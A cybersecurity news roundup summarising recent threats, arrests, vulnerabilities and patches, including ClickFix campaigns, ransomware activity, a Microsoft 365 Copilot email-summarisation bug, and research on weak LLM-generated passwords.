Cybersecurity Alert: OpenSSL RCE, Foxit 0-Days, Copilot Leak, and AI Password Flaws Uncovered in Latest ThreatsDay Bulletin

The ever-evolving cyber threat landscape is constantly changing, with new risks, tactics, and security gaps emerging across various platforms, tools, and industries simultaneously. This week, significant developments are taking place, shaping how defenders approach exposure, response, and preparedness.

This edition of the ThreatsDay Bulletin compiles these signals in one place, providing quick and clear updates on the cybersecurity and hacking landscape.

– Google’s announcement of the first beta version of Android 17 includes privacy and security enhancements, deprecating Cleartext Traffic Attribute and supporting HPKE Hybrid Cryptography for secure communication.
– LockBit 5.0 ransomware now has a Windows version with defense evasion techniques and the ability to target Proxmox, an open-source virtualization platform.
– A new ClickFix campaign targeting Mac users, named Matryoshka, uses nested obfuscation layers to trick victims into executing malicious Terminal commands.
– Another ClickFix campaign delivers a malware-as-a-service (MaaS) loader called Matanbuchus 3.0, aimed at deploying ransomware or exfiltrating data.
– Threat actors in a ClickFix campaign use typosquatting to host malicious instructions on fake Homebrew websites, leading to credential theft and the deployment of a macOS infostealer.
– A 47-year-old man has been detained in Europe for suspected ties to the Phobos ransomware group, part of Europol’s Operation Aether targeting ransomware groups.
– Ransomware groups are increasingly targeting industrial organizations, with a significant rise in attacks on operational technology (OT) and industrial control systems (ICS) in 2025.

These developments highlight the urgent need for defenders to stay vigilant and adapt to the evolving cyber threat landscape. Additionally, a hacking group known as Pyroxene has been identified as carrying out “supply chain-leveraged attacks targeting defense, critical infrastructure, and industrial sectors, with operations expanding from the Middle East into North America and Western Europe.” This group often uses initial access provided by PARISITE to move from IT networks into OT networks. Pyroxene’s activities overlap with those attributed to Imperial Kitten (also known as APT35), a threat actor associated with the cyber arm of the Islamic Revolutionary Guard Corps (IRGC).

In a separate incident, Microsoft acknowledged a bug (CW1226324) in Microsoft 365 Copilot that allowed the tool to summarize confidential emails from Sent Items and Drafts folders without user consent, thus bypassing data loss prevention (DLP) policies. Although a fix was deployed on February 3, 2026, the number of affected users or organizations was not disclosed.

Moreover, threat actors have been exploiting Atlassian Jira Cloud for spam campaigns, targeting organizations using Atlassian Jira to distribute spam emails and malicious links. These attacks primarily targeted government and corporate entities, aiming to trick recipients into clicking on links that lead to investment scams and online casino sites.

Furthermore, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) mandated the patching of a server-side request forgery (SSRF) vulnerability in GitLab (CVE-2021-22175) for Federal Civilian Executive Branch (FCEB) agencies. This vulnerability was actively exploited by threat actors targeting instances in various countries.

Additionally, a financially motivated threat actor named GS7 has been conducting phishing campaigns against Fortune 500 companies using Telegram bots to harvest credentials. This operation, dubbed Operation DoppelBrand, targets top financial institutions, technology firms, and healthcare organizations worldwide, aiming to steal credentials and potentially sell access to ransomware groups.

In a separate development, a new variant of the Remcos RAT has been observed using phishing emails to distribute malware that enables live surveillance and control over infected systems. This variant allows attackers to access live video streams from webcams, representing a significant shift in Remcos’ capabilities.

Lastly, Poland’s Ministry of Defence has banned Chinese vehicles equipped with surveillance technology from entering protected military facilities due to national security concerns. The ban also includes restrictions on connecting work phones to infotainment systems in Chinese-made vehicles, with plans to develop a vetting process for carmakers to undergo security assessments for entry into protected zones. The security measures implemented are proactive and aligned with the practices of NATO countries and other allies to ensure the highest standards of defense infrastructure protection. They are part of a broader effort to adapt security protocols to the evolving technological landscape and current needs for safeguarding critical infrastructure.

The misuse of legitimate invoices and dispute notifications by threat actors, known as DKIM replay attacks, is on the rise. Attackers exploit trusted vendor platforms like PayPal, Apple, and DocuSign to insert scam instructions and phone numbers into user-controlled fields, bypassing email security controls like DMARC.

A report from Huntress reveals a 277% increase in the abuse of Remote Monitoring and Management (RMM) software, accounting for 24% of all observed incidents. Cybercriminals are leveraging RMM tools due to their ubiquity in enterprise environments, making detection more challenging for defenders. This allows for increased stealth, persistence, and operational efficiency in malicious activities.

Texas Attorney General Ken Paxton has filed lawsuits against TP-Link and Anzu Robotics, alleging deceptive marketing practices and security risks linked to the Chinese Communist Party. TP-Link denies the allegations, stating that neither the Chinese government nor the CCP controls the company or user data.

The North Korea-linked Contagious Interview campaign has expanded its data theft capabilities by tampering with the MetaMask wallet extension. Attackers use a JavaScript backdoor to install a fake version of MetaMask, capturing victims’ wallet unlock passwords and gaining access to cryptocurrency funds.

Malicious activity targeting the hotel and retail sector has resurged, with threat actors impersonating the Booking.com platform through phishing kits to harvest credentials and banking information from hotel businesses and customers.

Exploitation of security flaws in Ivanti Endpoint Manager Mobile (EPMM) has allowed attackers to establish persistent access, delivering malware and maintaining long-term control over mobile device management infrastructure. This campaign has targeted various sectors in the U.S., Germany, Australia, and Canada, emphasizing the need for organizations to apply patches promptly. In a related development, Germany’s Federal Office for Information Security (BSI) has reported evidence of exploitation since the summer of 2025 and has urged organizations to audit their systems for indicators of compromise (IoCs) as far back as July 2025.

New research by Irregular has found that passwords generated directly by a large language model (LLM) may appear strong but are fundamentally insecure. The artificial intelligence (AI) security company recommends avoiding LLM-generated passwords and using secure password generation methods instead. Cybersecurity researchers have identified vulnerabilities in popular PDF platforms from Foxit and Apryse that could lead to account takeover and other security issues. Training labs exposing vulnerable applications to the public internet have been found to pose significant security risks, allowing attackers to compromise systems and sensitive data. The Oyster malware loader has evolved to refine its C2 infrastructure and obfuscation methods to enhance stealth. A malicious software known as Noodlophile, distributed via fake AI tools, has been found to contain a message taunting researchers, likely in response to being exposed. The OpenSSL project has patched a vulnerability that could lead to remote code execution attacks in its cryptographic library. Finally, new research has highlighted the risk of machine accounts being delegated, potentially allowing for unauthorized access to critical non-human identities in a domain.